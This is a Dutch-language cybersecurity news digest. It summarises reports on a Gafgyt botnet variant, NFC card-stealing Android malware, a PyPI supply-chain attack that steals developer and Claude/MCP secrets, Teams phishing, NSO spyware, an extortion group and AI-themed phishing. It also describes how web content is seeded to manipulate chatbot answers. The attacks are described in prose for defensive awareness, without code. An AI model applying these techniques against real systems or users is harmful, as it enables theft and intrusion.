De tool is ontwikkeld door beveiligingsonderzoeker @TwoSevenOneT en exploiteert een ingebouwde functionaliteit van het besturingssysteem van Windows. Het succesvol toepassen van EDRChoker biedt aanvallers een discrete manier om detectiemechanismen te omzeilen, wat de persistentie en onopgemerktheid van kwaadaardige activiteiten op een gecompromitteerd systeem aanzienlijk kan vergroten. Deze methode vormt een nieuwe uitdaging voor organisaties die vertrouwen op EDR-oplossingen voor hun beveiliging.

Bron: Zerosalarium

Onderzoekers van Fortinet hebben een nieuwe variant van het Gafgyt botnet ontdekt, genaamd C0XMO, die zich richt op DD-WRT router firmware en de capaciteit heeft om zich te verspreiden naar andere apparaattypen met diverse CPU-architecturen. Er zijn voorbeelden gevonden voor architecturen zoals ARM, MIPS, PowerPC, SuperH, x86 en x86_64, waarbij exploits worden ingezet tegen DVR's, routers, video management platformen en op Android gebaseerde apparaten. Hoewel het botnet aanvankelijk werd waargenomen bij een Japans technologiebedrijf, bleek het bron-IP-adres te zijn gekoppeld aan een apparaat in Duitsland.

C0XMO onderscheidt zich door zijn modulaire ontwerp, waardoor de beheerders de exploitatietechnieken kunnen actualiseren, doelgerichte architecturen kunnen toevoegen of verwijderen, en de mogelijkheden voor laterale beweging kunnen uitbreiden, onafhankelijk van de hoofdbenadering. Het primaire doel van C0XMO blijft het lanceren van gedistribueerde denial-of-service (DDoS)-aanvallen, waarbij het negentien verschillende methoden ondersteunt, waaronder UDP/TCP/SYN/ICMP floods, de "ping of death", NTP/Memcached amplificatie, Discord voice UDP floods en Valve-specifieke floods.

De verspreiding van de C0XMO botnet malware vindt plaats door misbruik te maken van CVE-2021-27137. Dit is een buffer overflow kwetsbaarheid die voortkomt uit onvoldoende validatie van gebruikersinvoer. De kwetsbaarheid kan zonder authenticatie worden misbruikt en leidt tot de uitvoering van willekeurige code. Voor een bredere distributie downloadt C0XMO een Python script dat aanvullende pakketten installeert, zoals 'requests', 'paramiko' en 'beautifulsoup4'. Deze pakketten zijn essentieel voor netwerkscanning, communicatie en het uitvoeren van activiteiten via SSH- en Telnet protocollen.

De scanner van C0XMO gebruikt vervolgens worker threads om willekeurig internetgerichte systemen te scannen op veelvoorkomende poorten zoals 22 (SSH), 23 (Telnet), 80/443 (HTTP/HTTPS), 7547, 8080, 8443 en 8888. Na het vinden van een doelwit probeert de malware zwakke Telnet- en SSH-inloggegevens te kraken via brute force, detecteert het de CPU-architectuur en implementeert een compatibele C0XMO binary. Het script bevat bijna twee dozijn functies voor diverse taken, waaronder scanning, het exploiteren van op HTTP en ADB gebaseerde kwetsbaarheden, het detecteren van de CPU-architectuur, SSH/Telnet-login en het controleren van IP-adressen. Het hoofddoel is laterale beweging binnen het netwerk.

Zodra de malware toegang heeft verkregen tot een apparaat, kopieert het zichzelf naar verborgen locaties zoals '/tmp/.sys', '/var/tmp/.sys' en '/dev/shm/.sys'. Vervolgens creëert het cron jobs die de malware elke vijftien minuten opnieuw starten, en worden shell opstartbestanden aangepast om automatische uitvoering mogelijk te maken.

Een opvallend kenmerk van C0XMO is zijn vermogen om actief draaiende processen te scannen om concurrerende botnet clients op de host te identificeren. Het detecteert ook tools van red teams, programmeertools en netwerkservices die de werking kunnen verstoren, en beëindigt deze. Dit gebeurt door het verwijderen van binaries en het wissen van hun persistentie mechanismen, inclusief cron jobs, initialisatiescripts, systeemservices en shell profielvermeldingen. Hierna maakt C0XMO verbinding met een hardcoded command-and-control (C2) adres via een aangepaste multi-stage handshake, die gebruikmaakt van 'magic strings' en gedeelde geheimen, waarna het wacht op commando's. De ondersteunde commando's omvatten heartbeat-checks, het starten en stoppen van scans, en het lanceren van DDoS aanvallen met een van de negentien beschikbare methoden.

Fortinet omschrijft C0XMO als een botnet met "een aanzienlijk geavanceerdere architectuur en feature set vergeleken met eerdere IoT botnets." De onderzoekers merken op dat het algehele ontwerp van de malware duidt op "een grotere operationele verfijning en complexiteit dan typische Gafgyt malware." De algemene aanbeveling ter verdediging tegen C0XMO en andere botnet malware is om apparaten up-to-date te houden, unieke inloggegevens voor beheerders te gebruiken en toegang op afstand uit te schakelen wanneer dit niet noodzakelijk is.

Bron: Fortinet

De opkomst van chatbots zoals ChatGPT en Google Gemini heeft geleid tot een nieuw fenomeen genaamd 'Answer Engine Optimization' (AEO). Dit bouwt voort op het bekende concept van Search Engine Optimization (SEO), waarbij content wordt geoptimaliseerd om goed gevonden te worden door zoekmachines. Bij AEO is het echter het doel om chatbots van AI te beïnvloeden.

Mensen en organisaties vullen specifieke delen van het internet met teksten, in de hoop dat modellen van AI deze informatie als waarheid overnemen. Het uiteindelijke doel is dat de chatbots deze gemanipuleerde teksten vervolgens doorgeven aan miljoenen gebruikers die de AI om informatie vragen. Dit mechanisme wordt misbruikt door spambots die actief proberen de output van chatbots van AI te sturen.

Deze ontwikkeling vormt een potentiële uitdaging voor de betrouwbaarheid van door AI gegenereerde informatie. Het risico bestaat dat chatbots onbedoeld desinformatie of bevooroordeelde content verspreiden die door derden via technieken van AEO is geïnjecteerd. Als reactie hierop hebben moderators van betrokken Reddit-gemeenschappen het plaatsen van losse berichten over de getroffen onderwerpen beperkt, terwijl Reddit zelf zegt te blijven investeren in spamdetectie en moderatie om de integriteit van de gegevens die aan modellen van AI worden gevoed te beschermen.

Bron: BNR Nieuwsradio

Een autonome AI-beveiligingsagent van het beveiligingsbedrijf Depthfirst heeft onlangs 21 zero-day kwetsbaarheden ontdekt in FFmpeg, een van 's werelds meest gebruikte bibliotheken voor mediaprocessing. Deze bibliotheek vormt de stille kracht achter mediatoepassingen in een breed scala aan systemen, waaronder webbrowsers, streaming platforms, bewakingssystemen en cloud infrastructuur. De ontdekking van deze kwetsbaarheden onderstreept de cruciale rol van FFmpeg in de hedendaagse digitale infrastructuur en de potentiële impact van beveiligingslekken daarin.

Onder de ontdekte kwetsbaarheden bevindt zich een bijzonder kritieke kwetsbaarheid, namelijk een heap buffer overflow die kan leiden tot remote code execution (RCE). Deze specifieke kwetsbaarheid is opmerkelijk omdat deze kan worden geactiveerd met een enkel netwerkpakket van slechts 183 bytes. Een succesvolle exploitatie van een dergelijke RCE kwetsbaarheid stelt aanvallers in staat om op afstand willekeurige code uit te voeren op getroffen systemen, wat kan leiden tot volledige controle over het systeem.

De aard van deze zero-day kwetsbaarheden, die reeds actief misbruikt kunnen worden voordat er patches beschikbaar zijn, maakt ze extreem gevaarlijk. Gezien de wijdverspreide implementatie van FFmpeg in diverse kritieke systemen, van consumentenapparaten tot grootschalige cloud omgevingen, heeft de ontdekking van deze 21 zero-days verstrekkende implicaties voor de mondiale cybersecurity. Het benadrukt de noodzaak voor snelle patching en mitigatiestrategieën zodra oplossingen beschikbaar komen.

Bron: Depthfirst

Dreigingsactoren verschuiven hun aandacht van traditionele e-mailphishing naar samenwerkingstools zoals Microsoft Teams, zo blijkt uit onderzoek. Criminelen maken gebruik van de hogere mate van vertrouwen die gebruikers hebben in deze interne communicatiekanalen om succesvolle social engineering aanvallen uit te voeren. Dit fenomeen is waargenomen door het Unit 42 Threat Research Center.

Een veelvoorkomend scenario begint met een bericht via Microsoft Teams, afkomstig van wat lijkt op de interne IT-afdeling of een externe IT-dienstverlener. Het bericht, vaak getagd als 'extern', informeert de gebruiker over een vermeend probleem met hun account, zoals een gedetecteerde inloganomalie. De aanvaller vraagt vervolgens de gebruiker om een multi-factor authenticatie (MFA) prompt goed te keuren om hun identiteit te bevestigen. Achter de schermen is de compromittering dan al in volle gang. Deze benadering is bijzonder effectief omdat gebruikers minder waakzaam zijn voor berichten binnen samenwerkingstools dan voor e-mails, waarvoor ze vaak getraind zijn op phishing-indicatoren.

Recente incidenten bevestigen deze trend. De dreigingsactor Cloaked Ursa, ook bekend als APT29, Cozy Bear en Midnight Blizzard, heeft deze methode eind 2024 succesvol toegepast. Zij gebruikten gecompromitteerde accounts om berichten te versturen met kwaadaardige links die slachtoffers naar nagemaakte Microsoft inlogpagina's leidden om inloggegevens te oogsten. In december 2025 imiteerde een dreigingsgroep, gevolgd door Mandiant als UNC6692, IT-helpdeskmedewerkers via Microsoft Teams. Deze groep overtuigde medewerkers om een chatuitnodiging te accepteren van een account buiten hun organisatie.

De cijfers onderstrepen de verschuiving. In de eerste vier maanden van 2026 vertegenwoordigden phishing-waarschuwingen van samenwerkingstools 42% van alle phishing-waarschuwingen in het Cortex-platform, een stijging van 30% in de vier maanden daarvoor. Organisaties hebben vooruitgang geboekt in de preventie van e-mailphishing door slimmere e-mailgateways en bewustzijnstrainingen, maar deze maatregelen gelden minder sterk voor samenwerkingstools.

Dreigingsactoren passen verschillende technieken toe om hun identiteit te verhullen en legitiem over te komen. Dit omvat het gebruik van typosquatted domeinen die sterk lijken op die van vertrouwde leveranciers of interne naamgevingsconventies. Soms opereren zij vanuit Microsoft 365 tenants die geen eerdere band hebben met de doelorganisatie, en die bewust zijn genoemd om IT-ondersteuningsfuncties, beveiligingsteams of managed service providers na te bootsen. In veel organisaties is Teams-federatie standaard ingeschakeld, wat communicatie met externe tenants mogelijk maakt tenzij dit expliciet door beleid wordt beperkt. In meer geavanceerde gevallen omzeilen aanvallers de noodzaak tot misleiding door legitieme accounts van dienstverleners of partners te compromitteren en bestaande vertrouwensrelaties te benutten om chats te initiëren vanaf vertrouwde domeinen.

Bron: Unit 42 | Bron 2: support.microsoft.com | Bron 3: learn.microsoft.com

Nieuwe varianten van de NFCShare malware voor Android worden verspreid als valse updates voor legitieme apps van banken, gehost op GitHub. De malware is geëvolueerd en richt zich nu op klanten van diverse banken en financiële instellingen in heel Europa via een phishingcampagne die gericht is op het stelen van gegevens van betaalkaarten.

Na het misleiden van slachtoffers met een vals verificatiescherm om hun kaarten dicht bij de Near-Field Communication (NFC) chip van het mobiele apparaat te plaatsen, leest NFCShare de informatie uit. Dit gebeurt met behulp van de IsoDep-interface van Android en EMV-commando's. De malware steelt het kaartnummer, het type kaart, de vervaldatum en een viercijferige pincode die door het slachtoffer wordt ingevoerd onder het mom van een beveiligingsstap. Deze gegevens worden vervolgens via een WebSocket-kanaal naar de command-and-control (C2) host van de aanvaller gestuurd. De aldus verzamelde informatie kan daarna worden gebruikt in NFC-betaalrelaisconstructies, vergelijkbaar met de eerder gedocumenteerde NGate, SuperCard X en RelayNFC aanvallen met malware.

NFCShare werd voor het eerst gedocumenteerd door onderzoekers van D3Lab in januari 2026. Zij volgen sindsdien de activiteit en evolutie van de malware. D3Lab-onderzoeker Andrea Draghetti merkte op dat, ondanks overeenkomsten met andere Android malware die NFC-chips misbruiken voor gegevensdiefstal, NFCShare onderscheidende code, bibliotheken, architectuur en implementatiedetails gebruikt. Hij sluit echter niet uit dat het een evolutie kan zijn binnen hetzelfde ecosysteem, gedreven door dezelfde dreigingsactoren.

Recente NFCShare aanvallen, die vanaf 14 mei zijn waargenomen, beginnen met het bezoek van het slachtoffer aan een phishingwebsite die een echte bank imiteert en om bankgegevens vraagt. Slachtoffers worden vervolgens aangespoord om hun bankapp bij te werken en worden omgeleid naar een GitHub-repository die een malafide APK-bestand host. Onderzoekers merken op dat sms-berichten of telefoongesprekken van nepvertegenwoordigers van banken ook kunnen worden ingezet als onderdeel van het social engineering-proces, hoewel D3Lab deze methoden niet direct heeft waargenomen bij de recente aanvallen.

Sinds de creatie op 10 april heeft de GitHub-repository die wordt gebruikt voor de distributie van NFCShare 56 unieke APK's gehost. Deze imiteerden mobiele apps voor banken, voornamelijk uit Italië en Spanje, waaronder apps zoals Intesa Carte.apk, Sella Carte.apk, Banca Sella Carte.apk, Nexi Carte.apk, Fideuram Carte.apk, Mooney Carte.apk, CaixaBank.apk, CaixaBankNfc.apk en CaixaReactivaTarjeta.apk. In januari meldde D3Lab dat de malware zich alleen richtte op Deutsche Bank in Duitsland, wat duidt op een uitgebreidere targeting.

Een interessant aspect van de nieuwe versie van de malware is de introductie van misvormde APK-verpakking om geautomatiseerde analyse, en mogelijk ook beveiligingstools, te hinderen. Hoewel de APK nog steeds een ZIP-archief is, bevatten de nieuwere samples vergiftigde of misvormde bestandspaden binnen de ZIP. Dit veroorzaakt dat sommige extractietools interne relatieve paden verkeerd interpreteren als bestandssysteempaden en fouten genereren. D3Lab merkt echter op dat deze truc handmatige analyse of herstel van code niet verhindert; het verstoort eerder statische analyse in bepaalde tools.

Android-gebruikers wordt geadviseerd om apps van banken alleen via Google Play te downloaden, Play Protect in te schakelen en voorzichtig te zijn met verificatieverzoeken die vragen om NFC-kaartscans.

Bron: D3Lab | Bron 2: hubs.li

WhatsApp heeft een nieuwe spyware campagne, gelinkt aan het Israëlische surveillance bedrijf NSO Group, verstoord en vraagt nu een Amerikaanse federale rechtbank om het bedrijf te veroordelen wegens minachting van een permanent bevel. Deze actie volgt op een eerdere juridische overwinning voor WhatsApp en moederbedrijf Meta in hun langlopende zaak tegen NSO Group. De rechtbank had NSO al verboden om WhatsApp of haar gebruikers te targeten, nadat was vastgesteld dat het bedrijf federale en staatshackingwetten had overtreden in verband met een aanval in 2019 op ongeveer 1.400 gebruikers.

Ditmaal stelt WhatsApp dat de activiteit niet afhankelijk was van een onbekende WhatsApp kwetsbaarheid. Het bedrijf heeft meldingen van gebruikers onderzocht en spear phishing inspanningen ontdekt die mensen probeerden te verleiden naar kwaadaardige externe websites. Het doel was om gebruikers op een link buiten WhatsApp te laten klikken, een methode die vergelijkbaar is met eerdere één klik campagnes die aan NSO zijn gekoppeld.

In een persbericht dat vandaag werd gepubliceerd, meldde WhatsApp ook dat het testaccounts en groepen die op haar platform waren aangemaakt, heeft gevonden en verwijderd. Het bedrijf heeft drie domeinen gepubliceerd die volgens hen bij de activiteit zijn gebruikt, zodat onderzoekers, bedrijven en gebruikers kunnen controleren of zij via WhatsApp, sms, e-mail of een ander kanaal zijn benaderd. De door WhatsApp genoemde domeinen zijn: `fr24cast.com`, `ghazacast.com` en `ikhwancast.com`.

John Scott Railton, een senior onderzoeker bij Citizen Lab, merkte op dat de nieuwe claims juridisch en beleidsmatig zwaar wegen, omdat ze komen op een moment dat NSO Group probeert zichzelf als "hervormd" te presenteren. Hij voegde eraan toe dat het domein "fr24cast" mogelijk bedoeld was om France 24 te imiteren, hoewel dit niet door WhatsApp is bevestigd. Het geschil spitst zich nu toe op de vraag of een spyware leverancier een gerechtelijk bevel kan negeren en dezelfde dienst kan blijven onderzoeken die het verboden was te benaderen. WhatsApp wil dat de rechter de recente activiteit behandelt als een schending van het bevel, en niet als een nieuw incident dat vanaf de basis moet worden beargumenteerd.

Sinds 2021 staat NSO Group onder Amerikaanse handelsbeperkingen, toen het Ministerie van Handel het bedrijf toevoegde aan de Entity List vanwege spyware die aan buitenlandse regeringen werd geleverd. Amerikaanse functionarissen stelden dat de tools waren gebruikt om journalisten, ambtenaren, activisten, academici, zakenmensen en ambassadepersoneel te targeten.

WhatsApp benadrukt dat dit meer is dan een WhatsApp probleem, en stelt dat mercenary spyware een bedreiging blijft vormen voor gebruikers, bedrijven en overheden, die geen enkel bedrijf alleen kan bestrijden. Tegelijkertijd blijven WhatsApp berichten en gesprekken standaard beschermd door end-to-end encryptie. Gebruikers met een hoger risico wordt geadviseerd om hun apparaten up-to-date te houden, verdachte activiteiten te melden en strengere accountinstellingen te gebruiken. Meta ondersteunt ook extern spyware onderzoek en heeft aangekondigd te doneren aan het Spyware Accountability Initiative, dat groepen ondersteunt die zich richten op forensische analyse, slachtofferhulp en beleidswerk.

Het bedrijf haalde eerdere zero-day bevindingen van Citizen Lab aan die leidden tot Apple beveiligingsupdates, samen met een recente Griekse strafrechtelijke veroordeling van Intellexa spyware executives, als voorbeelden van succesvol maatschappelijk werk. De nieuwe aanklacht zet ook verdere druk op het argument van NSO dat het moet worden behandeld als een legitieme beveiligingsleverancier die overheidscliënten bedient. De gevolgen voor het spyware bedrijf hangen nu mogelijk minder af van de spyware capaciteit en meer van de vraag of een federale rechter akkoord gaat dat het bedrijf een reeds door de rechtbank getrokken lijn heeft overschreden. Niettemin moeten WhatsApp gebruikers voorzichtig zijn met verdachte links, zelfs als deze afkomstig lijken te zijn van bekende contacten of in berichten verschijnen die verband lijken te houden met actuele gebeurtenissen. De kwaadaardige domeinen die door WhatsApp zijn gedeeld, lijken ook te verwijzen naar Gaza en de Moslimbroederschap. Eén domein gebruikt "Ikhwan" (إخوان), wat "broeders" betekent in het Arabisch en vaak wordt gebruikt om te verwijzen naar de Moslimbroederschap, een belangrijke transnationale islamitische politieke organisatie.

Bron: WhatsApp | Bron 2: about.fb.com | Bron 3: commerce.gov

Hackers hebben negentien pakketten op de Python Package Index (PyPI) gecompromitteerd in een nieuwe supply chain aanval die bekendstaat als "Shai-Hulud". Deze pakketten zijn gezamenlijk honderdduizenden keren gedownload en bevatten malware die is ontworpen om secrets van ontwikkelaars te stelen. Veel van de geïnfecteerde pakketten zijn populaire bio-informatica tools, waaronder Dynamo, Spateo, CoolBox, U-FISH en Napari-UFISH.

De nieuwe campagne werd ontdekt door het applicatiebeveiligingsbedrijf Socket. Onderzoekers attribueren de aanval aan één enkele maintainer, die verantwoordelijk is voor 37 kwaadaardige releases verspreid over de negentien pakketten. De malafide artefacten omvatten een `*-setup.pth` bestand en een geobfusceerde JavaScript payload genaamd `_index.js`. De malware wordt geactiveerd zodra een gebruiker Python start, waarna het `PTH` bestand de Bun JavaScript runtime van GitHub probeert te downloaden om het gebundelde script uit te voeren. Socket waarschuwt dat een gecompromitteerde 'wheel' (een distributieformaat voor Python-pakketten) een anders passieve afhankelijkheidsinstallatie kan omzetten in een vertraagde uitvoertrigger, waarbij elke volgende Python-, pip-, test-run, notebook kernel-, CI-job- of package management command die Python start, het malafide `.pth` bestand kan verwerken.

Deze aanval wordt beschouwd als onderdeel van de bredere "Shai-Hulud" campagne, gezien de overeenkomsten in gebruikte technieken met eerdere aanvallen. Socket volgt deze nieuwe golf naast eerdere incidenten, waardoor het totale aantal malafide artefacten dat aan Shai-Hulud activiteiten wordt toegeschreven, nu op 453 items staat.

Een analyse van de JavaScript payload onthulde dat deze gericht is op een breed scala aan secrets van ontwikkelaars. Hieronder vallen GitHub tokens en GitHub Actions secrets, publicatie-tokens voor npm, PyPI, RubyGems en JFrog, credentials voor AWS, GCP, Azure, Kubernetes en Vault, SSH sleutels, Docker credentials, `.env`, `.npmrc`, `.pypirc` bestanden, Shell histories, configuratiebestanden van Claude/MCP, en andere secrets van ontwikkelaarswerkstations en CI/CD-omgevingen.

Het primaire doel van de aanval is het compromitteren van softwareontwikkelingsworkflows om de malware verder te verspreiden. De belangrijkste methode voor data-exfiltratie is vergelijkbaar met eerdere Shai-Hulud operaties, waarbij automatisch aangemaakte GitHub repositories worden gebruikt om via GitHub Actions de gestolen secrets te hosten. Een secundaire exfiltratiemethode maakt gebruik van directe HTTPS naar een legitiem, maar ongeldig Anthropic API endpoint (api[.]anthropic[.]com/v1/api), wat volgens Socket waarschijnlijk als camouflage dient.

De malware beschikt tevens over ontwijkingsmechanismen, zoals het controleren op Russische locales/omgevingen en security tools zoals StepSecurity Harden-Runner. Persistentie wordt bewerkstelligd via systemd services op Linux en LaunchAgents op macOS, terwijl ook GitHub workflow- en Claude/MCP-configuratiebestanden worden misbruikt.

Socket adviseert organisaties die de getroffen pakketten hebben geïnstalleerd om alle secrets te roteren en hun omgevingen te herstellen van veilige backups. Verdedigers moeten alert zijn op Python pakketten die uitvoerbare `.pth` startup hooks bevatten, onverwachte downloads van de Bun JavaScript runtime van GitHub, en procesketens waarbij Python Bun lanceert om `_index.js` uit te voeren.

Bron: Socket | Bron 2: hubs.li

De opkomst van een geavanceerde AI-capaciteit, bekend als 'Mythos', vormt een fundamentele verschuiving in het landschap van cybersecurity en open source software. Experts bevestigen dat Mythos geen marketingstunt is, maar een reële en zorgwekkende ontwikkeling die in staat is om complexe kwetsbaarheden te ontdekken door tientallen bestaande problemen op nieuwe manieren te combineren. Dit resulteert in veel gevaarlijkere exploits, waaronder Remote Code Execution (RCE), en wordt beschouwd als een geheel nieuwe categorie van dreiging, ver voorbij de mogelijkheden van traditionele statische analyse tools (SAST).

Deze nieuwe capaciteit, of deze nu specifiek van Mythos afkomstig is of van vergelijkbare ontwikkelingen, zal onvermijdelijk de veiligheid van open source software onder druk zetten. De Amerikaanse overheid volgt deze ontwikkelingen al langer en worstelt met de vraag hoe hierop te reageren. Regulering is complex, aangezien te weinig regulering kan leiden tot de onbedoelde creatie van digitale wapens die kritieke infrastructuur bedreigen, terwijl te veel regulering innovatie naar andere landen kan verplaatsen. De situatie wordt vergeleken met 'gain-of-function' onderzoek naar virussen, waarbij internationale samenwerking en naleving van regels essentieel zijn, maar moeilijk af te dwingen.

De huidige manier waarop open source software wordt ontwikkeld en geconsumeerd, is volgens experts niet voorbereid op deze dreiging. Moderne applicaties bestaan uit talloze afhankelijkheden, en een kwetsbaarheid in één component kan een cascade van problemen veroorzaken door de hele softwarestack. AI heeft de risico's van supply chain aanvallen enorm versterkt; het overhaast patchen van een kwetsbaarheid zonder grondige controle kan leiden tot de installatie van malware die erger is dan het oorspronkelijke probleem.

De situatie is nog complexer voor de onderhouders van open source projecten. Velen werken in hun vrije tijd aan cruciale software en worden al jaren overspoeld met ruis van geautomatiseerde scanners en AI gegenereerde rapporten. In tegenstelling tot commerciële software ontbreken contracten en Service Level Agreements (SLA's), waardoor er geen garantie is dat patches tijdig worden geschreven of geïmplementeerd. Het traditionele model van gecoördineerde kwetsbaarheidsmelding, ontworpen voor een wereld waarin het vinden van ernstige kwetsbaarheden weken van gespecialiseerd werk vereiste, kan de honderden kwetsbaarheden die een AI model nu in één nacht kan vinden, niet bijbenen.

Om deze uitdagingen het hoofd te bieden, worden twee plannen voorgesteld. Plan A omvat een gecoördineerd meldingsproces dat op schaal werkt, uitgevoerd door één enkele, betrouwbare groep die gevalideerde rapporten en patches doorstuurt naar onderhouders en hen ondersteunt. Een initiatief als Glasswing heeft momenteel slechts 6% van zijn bevindingen succesvol stroomopwaarts gekregen, met een geschat potentieel van 50% onder optimale omstandigheden. Plan B betreft de aanpak voor de resterende projecten waar patches niet tijdig of helemaal niet kunnen worden geleverd. Hiervoor is een 'laatste redmiddel'-onderhouder nodig, die het recht op forken (het onafhankelijk voortzetten van een project) benut om projecten te beheren en te onderhouden, zodat eindgebruikers kunnen vertrouwen op de veiligheid van deze geforkte versies. De AI-capaciteiten die de crisis veroorzaken, kunnen paradoxaal genoeg ook de oplossing bieden door het concept van een 'laatste redmiddel'-onderhouder schaalbaar te maken.

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

De Silent Ransom Group (SRG), een cyberafpersingsgroep die sinds 2022 actief is, maakt gebruik van een geavanceerd fast flux botnet om de locaties van hun datalekwebsites te verbergen en zo opsporing door wetshandhaving te omzeilen. Dit blijkt uit recent onderzoek van dreigingsinformatiebedrijf Resecurity. De groep richt zich voornamelijk op advocatenkantoren en maakt daarbij geen gebruik van traditionele ransomware om systemen te versleutelen, maar focust zich volledig op datadiefstal en afpersing.

Volgens het onderzoek van Resecurity gebruikt SRG de fast flux-techniek om hun infrastructuur te maskeren. Deze methode verbindt hun websites met een roterend netwerk van gewone internetverbindingen, modems en routers bij consumenten in achttien landen, waaronder Mexico, Brazilië, Argentinië en Zuid-Korea. De internetadressen veranderen elke paar minuten, wat het voor internetaanbieders extreem moeilijk maakt om de infrastructuur offline te halen. Het botnet maakt gebruik van 22 unieke internetaanbieders over 24 IP-adressen, waarbij elke IP op een andere internetaanbieder draait, wat duidt op een professionele opzet met gecompromitteerde apparaten wereldwijd.

Advocatenkantoren zijn een primair doelwit omdat zij zeer gevoelige klantinformatie, zoals lopende rechtszaken en intellectueel eigendom, bewaren. De aanvallers gaan ervan uit dat deze kantoren snel losgeld zullen betalen om hun reputatie te beschermen en juridische gevolgen te voorkomen. In de eerste drie maanden van 2026 waren advocatenkantoren goed voor bijna een kwart van alle gevolgde hackincidenten. De groep dreigt gestolen bestanden te publiceren op een openbare website genaamd business-data-leaks.com als slachtoffers weigeren te betalen. Tot december 2024 opereerde de groep onder de naam LeakedData, een naam die nog steeds op het platform wordt gebruikt. Begin juni 2026 waren er bijna honderd bedrijven als slachtoffer vermeld op deze site.

SRG gebruikt diverse methoden voor initiële toegang en infiltratie. Ze misleiden medewerkers vaak via vishing (voice phishing) of social engineering aanvallen, waarbij ze zich telefonisch voordoen als IT-ondersteunend personeel om toegang te krijgen tot interne systemen. Ook zijn er gevallen bekend waarbij ingehuurde medewerkers zich voordeden als technische ondersteuning in de kantoren van advocaten om fysieke beveiliging te omzeilen en data direct van lokale computers te stelen. Minstens 38 advocatenkantoren hebben als gevolg van deze tactieken data gelekt.

Eerdere waarschuwingen over SRG dateren van november 2023, toen de FBI waarschuwde dat de groep casino-leveranciers aanviel met callback-phishing. In mei 2025 verschoof de focus naar advocatenkantoren, waarbij medewerkers direct werden gebeld om software voor toegang op afstand te installeren. Een recente analyse linkt de groep ook aan een nieuw project genaamd Spy Corporate, dat in mei 2026 opdook en dezelfde netwerken van gecompromitteerde thuisrouters gebruikt voor een andere datalekwebsite. Resecurity deelt deze gegevens met internetaanbieders om de kwaadaardige verbindingen te blokkeren.

De aanhoudende activiteiten van SRG benadrukken het serieuze gevaar voor juridische organisaties. De groep steelt niet alleen data, maar bouwt ook infrastructuur die moeilijker te verwijderen is en gebruikt menselijke interactie, valse IT-ondersteuning en tools voor toegang op afstand om toegang te krijgen tot gevoelige cliëntgegevens. Het blokkeren van een enkele website of IP-adres is onvoldoende. Advocatenkantoren dienen strengere controles voor ondersteuningsverzoeken, strakkere controles voor toegang op afstand en goed opgeleid personeel te implementeren om telefoonscams te herkennen en verdachte contacten te rapporteren voordat bestanden het netwerk verlaten.

Bron: Resecurity

Cybercriminelen maken in toenemende mate gebruik van de wereldwijde interesse in kunstmatige intelligentie (AI) om social engineering aanvallen uit te voeren. Microsoft Threat Intelligence heeft de afgelopen maanden een groeiend aantal campagnes waargenomen die de merknamen van populaire AI-platformen, zoals ChatGPT, Microsoft Copilot, DeepSeek en Anthropic’s Claude, imiteren als lokmiddel. Deze campagnes omvatten phishing, malvertising en door zoekmachineoptimalisatie (SEO) aangedreven aanvallen, die uiteindelijk leiden tot diefstal van inloggegevens, financiële fraude of malware-infectie.

Dreigingsactoren zijn er snel bij om te profiteren van langverwachte lanceringen of opkomende trends. Ze misbruiken vertrouwde merknamen en exploiteren de nieuwsgierigheid van gebruikers om de succespercentages van hun campagnes te verhogen. Ondanks het thema van AI, combineren deze campagnes beproefde tactieken, zoals berichten die urgentie uitstralen, misbruik van vertrouwde diensten en redirectieketens in meerdere fasen die gebruikersinteractie vereisen om detectie te omzeilen.

Hoewel traditionele lokmiddelen zoals facturen, betalingsmeldingen of leveringswaarschuwingen effectief blijven en veel worden gebruikt, weerspiegelen lokmiddelen met een AI-thema een verschuiving in social engineering. Dit zal waarschijnlijk een langetermijntactiek blijven voor dreigingsactoren, variërend van cybercriminele groepen tot natiestaten. Microsoft Threat Intelligence heeft met name waargenomen dat de initial access broker Storm-3075 malvertising met een AI-thema gebruikt om payloads te leveren. Deze payloads omvatten malware die is ondertekend via de malware-ondertekening-als-een-dienst (MSaaS) die wordt toegeschreven aan de financieel gemotiveerde dreigingsactor Fox Tempest, ten behoeve van meerdere downstream actoren.

Op 5 mei 2026 detecteerde Microsoft een aanval met phishing met een ChatGPT-thema. Deze leverde kwaadaardige URL’s die naar phishingpagina's leidden, waar creditcard- en persoonlijke informatie zoals namen en adressen werden verzameld. Deze phishingactiviteit, die bestond uit 4.500 e-mails naar doelwitten in Zuid-Afrika (97%), maakte deel uit van een bredere campagne met vergelijkbare thema's en infrastructuur. Op één dag werden tot wel 100.000 e-mails naar doelwitten in Zwitserland, Oostenrijk en Zuid-Afrika gestuurd, waarbij een breed scala aan sectoren werd getroffen, waaronder hoger onderwijs en professionele diensten.

De e-mails gebruikten de afzenderweergavenaam 'ChatGPT' en de onderwerpregel "To ensure your ChatGPT Plus continues to work, please update your payment method". Ze deden zich voor als een urgent verzoek om de betaalmethode voor een ChatGPT Plus-abonnement bij te werken, met de waarschuwing dat het account zou worden gedowngraded naar een gratis abonnement als er niet binnen zeven dagen een nieuwe betaalmethode werd opgegeven. Een logo van ChatGPT was prominent bovenaan de e-mailtekst weergegeven.

De phishing-e-mail bevatte een aanklikbare knop "Update payment method", die gebruikers niet direct naar de door de aanvallers gecontroleerde site stuurde. In plaats daarvan werden gebruikers omgeleid via een reeks legitieme en misbruikte redirector-hops. Deze techniek wordt vaak gebruikt door dreigingsactoren om de reputatie van vertrouwde domeinen te exploiteren en e-mailfilters te omzeilen, detectie te ontwijken en de betrokkenheid van slachtoffers te volgen.

Doelwitten werden eerst naar grupoconstat[.]bitrix24[.]com[.]br gestuurd (een legitieme customer relationship management (CRM)-dienst), die omleidde naar awstrack[.]me (een domein van Amazon dat wordt gebruikt voor het volgen van geopende e-mails en klikken), dat op zijn beurt omleidde naar een Rebrandly URL (een legitieme maar vaak misbruikte URL-verkorter). Uiteindelijk werden doelwitten naar een waarschijnlijk legitiem maar gecompromitteerd domein legendarytrendsbay[.]shop gestuurd, waar de dreigingsactor de phishingpagina in de /ChatGPT/-map had geplaatst.

De landingspagina toonde niet onmiddellijk de inhoud van de phishingpagina. Eerst moesten bezoekers een aangepaste CAPTCHA passeren, een simpele "Update payment"-knop. Na het klikken op deze knop werden gebruikers naar de volgende pagina gestuurd waar persoonlijke informatie, waaronder voornaam, achternaam en adres, werd verzameld. De laatste pagina verzamelde vervolgens de naam, het creditcardnummer, de vervaldatum en de kaartverificatiecode.

